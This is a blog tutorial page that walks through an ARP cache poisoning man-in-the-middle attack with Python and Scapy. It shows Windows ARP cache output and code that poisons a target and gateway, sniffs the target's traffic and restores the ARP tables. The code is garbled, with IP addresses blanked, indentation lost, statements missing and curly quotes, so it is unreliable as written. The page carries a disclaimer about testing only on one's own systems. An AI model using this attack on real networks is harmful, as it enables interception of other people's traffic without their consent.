How to perform ARP Cache Poisoning with Scapy

Follow by Email

ARP poisoning is one of the oldest yet most effective tricks in a hacker’s toolkit. Quite simply, we will convince a target machine that we have become its gateway, and we will also convince the gateway that in order to reach the target machine, all traffic has to go through us. Every computer on a network maintains an ARP cache that stores the most recent MAC addresses that match to IP addresses on the local network, and we are going to poison this cache with entries that we control to achieve this attack. Because the Address Resolution Protocol and ARP poisoning in general is covered in numerous other materials, I’ll leave it to you to do any necessary research to understand how this attack works at a lower level. Now that we know what we need to do, let’s put it into practice. When I tested this, I attacked a real Windows machine and used my Kali VM as my attacking machine. I have also tested this code against various mobile devices connected to a wireless access point and it worked great. The first thing we’ll do is check the ARP cache on the target Windows machine so we can see our attack in action later on. Examine the following to see how to inspect the ARP cache on your Windows VM.


C:\Users\Clare> ipconfig

Windows IP Configuration

Wireless LAN adapter

Wireless Network Connection:

Connection-specific DNS Suffix  . :

Link-local IPv6 Address . . . . . : fe80::34a0:48cd:579:a3d9%11

IPv4 Address. . . . . . . . . . . :

Subnet Mask . . . . . . . . . . . :

Default Gateway . . . . . . . . . :

C:\Users\Clare> arp -a

Interface: — 0xb

Internet Address      Physical Address         Type          3c-ea-4f-2b-41-f9        dynamic          ff-ff-ff-ff-ff-ff        static            01-00-5e-00-00-16        static           01-00-5e-00-00-fb        static           01-00-5e-00-00-fc        static       ff-ff-ff-ff-ff-ff        static

So now we can see that the gateway IP address  is at and its associated ARP cache entry  has a MAC address of 3c-ea-4f-2b-41-f9. We will take note of this because we can view the ARP cache while the attack is ongoing and see that we have changed the gateway’s registered MAC address. Now that we know the gateway and our target IP address, let’s begin coding our ARP poisoning script. Open a new Python file, call it, and enter the following code:

Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you.

from scapy.all import *

import os

import sys

import threading

import signal

interface = "en1"

target_ip = ""

gateway_ip = ""

packet_count = 1000

# set our interface conf.iface = interface
# turn off output

conf.verb = 0

print "[*] Setting up %s" % interface

gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:

print "[!!!] Failed to get gateway MAC. Exiting."



print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)

target_mac = get_mac(target_ip)

if target_mac is None:

print "[!!!] Failed to get target MAC. Exiting."



print  "[*] Target %s is at %s" % (target_ip,target_mac)

# start poison thread

poison_thread = threading.Thread(target = poison_target, args = (gateway_ip, gateway_mac,target_ip,target_mac)) poison_thread.start()


print "[*] Starting sniffer for %d packets" % packet_count

bpf_filter = "ip host %s" % target_ip

packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)

# write out the captured packets


# restore the network                        restore_target(gateway_ip,gateway_mac,target_ip,target_mac)

except KeyboardInterrupt:

# restore the network     restore_target(gateway_ip,gateway_mac,target_ip,target_mac)



This is the main setup portion of our attack. We start by resolving the gateway  and target IP  address’s corresponding MAC addresses using a function called get_mac that we’ll plumb in shortly. After we have accomplished that, we spin up a second thread to begin the actual ARP poisoning attack . In our main thread, we start up a sniffer  that will capture a preset amount of packets using a BPF filter to only capture traffic for our target IP address. When all of the packets have been captured, we write them out  to a PCAP file so that we can open them in Wireshark or use our upcoming image carving script against them. When the attack is finished, we call our restore_target function , which is responsible for putting the network back to the way it was before the ARP poisoning took place. Let’s add the supporting functions now by punching in the following code above our previous code block: def restore_target(gateway_ip,gateway_mac,target_ip,target_mac): # slightly different method using send print “[*] Restoring target…” ➊ send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst=”ff:ff:ff:ff:ff:ff”,hwsrc=gateway_mac),count=5) send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst=”ff:ff:ff:ff:ff:ff”,hwsrc=target_mac),count=5) # signals the main thread to exit

Take your time to comment on this article.

Follow by Email


  1. Dan Richter 2017-05-11 Reply
  2. emon 2017-08-27 Reply

Add a Comment

Your email address will not be published. Required fields are marked *

Like the article? please consider sharing it. Thank you

Advertisment ad adsense adlogger